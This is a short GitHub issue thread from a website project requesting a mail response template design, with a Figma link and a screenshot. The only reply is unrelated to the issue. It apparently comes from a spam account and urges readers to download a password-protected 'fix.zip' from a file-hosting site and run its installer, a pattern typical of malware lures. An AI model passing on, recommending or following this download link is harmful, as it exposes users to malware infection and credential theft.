### ISSUE TITLE
Mail design

### ISSUE THREAD

**Issue by AleksandraKozubal** [blumilksoftware/website#330]
There is a need to create nice looking mail response template.
[Desktop design](https://www.figma.com/design/sdPYb47iLBwsA2FQMIu5BR/Blumilk?node-id=1477-134&node-type=FRAME&t=Eitf1cbWtgVWllef-0)
Current design:
![image](https://github.com/blumilksoftware/website/assets/104600942/406a6743-3aa9-4ffa-9539-3d165d3c99bd)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
